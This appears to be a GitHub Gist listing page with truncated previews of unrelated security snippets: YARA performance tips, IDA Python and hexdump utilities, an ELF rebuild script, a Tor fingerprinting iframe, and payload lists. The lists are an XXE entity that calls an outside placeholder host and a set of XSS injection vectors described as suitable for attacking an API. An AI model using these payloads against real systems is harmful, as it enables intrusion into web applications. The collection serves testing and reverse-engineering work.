@Neo23x0
Neo23x0 / yara_performance_guidelines.md
Last active December 22, 2024 23:49
YARA Performance Guidelines

This Gist has been transferred into a GitHub Repo. You'll find the most recent version here.

YARA Performance Guidelines

When creating your rules for YARA keep in mind the following guidelines in order to get the best performance from them. This guide is based on ideas and recommendations by Victor M. Alvarez and WXS.

  • Revision 1.4, October 2020, applies to all YARA versions higher than 3.7
@staaldraad
staaldraad / XXE_payloads
Last active May 5, 2025 16:10
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
#!/usr/bin/env python
"""
Reconstitute an ELF file based on the ELF header in the *.b00
file and the data in each of the other files.
"""
import sys, struct, glob, os
def readfmt(f, fmt):
    d = f.read(struct.calcsize(fmt))
@Rurik
Rurik / asm_find_math.py
Last active September 16, 2023 17:17
Detect subroutines that may have encryption/encoding routines by finding XOR and shift routines.
# Automatically find XOR/SHL/SHR routines from an executable
# Uses IDAW (text IDA)
# @bbaskin - brian @ thebaskins.com
# While other, more powerful scripts like FindCrypt find known
# algorithms this is used to find custom encoding or modified
# encryption routines
"""
Script results:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
@bNull
bNull / gist:7684598
Created November 27, 2013 23:01
python hexdump
def hexdump(src, length=16, sep='.'):
    """Modified from: https://gist.github.com/7h3rAm/5603718
    """
    FILTER = ''.join([(len(repr(chr(x))) == 3) and chr(x) or sep for x in range(256)])
    lines = []
    for c in xrange(0, len(src), length):
        chars = src[c:c+length]
        hex = ' '.join(["%02x" % ord(x) for x in chars])
        if len(hex) > 24:
            hex = "%s %s" % (hex[:24], hex[24:])
@mbijon
mbijon / iframe.html
Created August 4, 2013 19:42
Tor fingerprinting code-injection (allegedly by FBI) --from: http://www.twitlonger.com/show/n_1rlo0uu
//nl7qbezu7pqsuone.onion/?requestID=203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0 iframe:
<html>
<body>
<iframe frameborder=0 border=0 height=1 width=1 id="iframe"> </iframe>
</body>
</html>
<script>
@bNull
bNull / gist:6003874
Last active August 1, 2021 07:43
IDA Python script that will allow you to highlight a range of bytes and turn it into dwords (for manually fixing up tables or whatever).
# hotkey_utils.py - bNull
#
# Some useful shortcuts for binding to hotkeys. Current output/hotkeys:
#
# [+] Bound make_dwords to Ctrl-Alt-D
# [+] Bound make_cstrings to Ctrl-Alt-A
# [+] Bound make_offset to Ctrl-Alt-O
import idaapi
import idc
@JohannesHoppe
JohannesHoppe / 666_lines_of_XSS_vectors.html
Created May 20, 2013 13:38
666 lines of XSS vectors, suitable for attacking an API copied from http://pastebin.com/48WdZR6L
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>
'`"><\x00script>javascript:alert(1)</script>
<img src=1 href=1 onerror="javascript:alert(1)"></img>
@7h3rAm
7h3rAm / hexdump.py
Last active April 26, 2021 20:49
hexdump implementation in Python
#!/usr/bin/env python3
def hexdump(src, length=16, sep='.'):
    """
    >>> print(hexdump('\x01\x02\x03\x04AAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBB'))
    00000000: 01 02 03 04 41 41 41 41 41 41 41 41 41 41 41 41 |....AAAAAAAAAAAA|
    00000010: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 42 42 |AAAAAAAAAAAAAABB|
    00000020: 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 |BBBBBBBBBBBBBBBB|
    00000030: 42 42 42 42 42 42 42 42 |BBBBBBBB|
    >>>
@syndrowm
syndrowm / get_stack_arg.py
Created June 21, 2012 21:26
idapython script to resolve stack variable names
from idaapi import *
from idc import *
def get_stack_arg(arg, base='ebp'):
    # find the stack frame
    stack = GetFrame(here())
    size = GetStrucSize(stack)
    # figure out all of the variable names
    names = []